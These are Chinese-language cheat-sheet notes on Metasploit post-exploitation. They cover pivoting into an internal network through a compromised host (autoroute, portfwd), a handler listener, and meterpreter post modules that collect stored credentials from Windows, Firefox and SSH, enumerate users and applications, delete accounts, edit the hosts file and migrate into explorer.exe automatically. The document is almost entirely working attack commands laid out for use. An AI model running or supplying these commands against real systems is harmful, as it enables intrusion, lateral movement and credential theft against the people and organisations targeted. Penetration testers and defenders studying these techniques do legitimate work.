跳板
autoroute
- 利用已经控制的一台计算机作为入侵内网的跳板
- 在其它内网计算机看来访问全部来自跳板机
- run autoroute -s 2.2.2.0/24 #不能访问外网的目标网段
- run autoroute -p
- use auxiliary/scanner/portscan/tcp
portfwd
- 利用已经被控计算机,在kali与攻击目标之间实现端口转发
- portfwd add -L LIP -l LPORT -r RIP -p RPORT
- portfwd list /delete/flush
POST
- use exploit/multi/handler
- set exitonsession false当建立一个session后不会退出
- run -j -z
meterpreter >
run post/windows/gather/arp_scanner RHOSTS=192.168.43.0/24
run post/windows/gather/checkvm
run post/windows/gather/credentials/credential_collector
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_snmp
run post/multi/recon/local_exploit_suggester检查可用的本地提权漏洞模块
run post/windows/manage/delete_user USERNAME=flower
run post/multi/gather/firefox_creds 收集firefox缓存的账户密码
run post/multi/gather/ssh_creds 收集ssh身份认证信息
run post/multi/gather/check_malware REMOTEFILE=c:\\windows\\system32\\cmd.exe
run hostsedit -e 1.1.1.1 www.baidu.com 编辑hosts文件
自动执行meterpreter脚本
set AutoRunScript migrate -N explorer.exe
set InitialAutoRunScript checkvm
自动执行post模块
- set InitialAutoRunScript migrate -n explorer.exe
- set AutoRunScript post/windows/gather/dumplinks收集最近打开的文档(首先要先切换到目标用户,migrate目标用户所在进程)
- InitialAutoRunScript 先于 AutoRunScript执行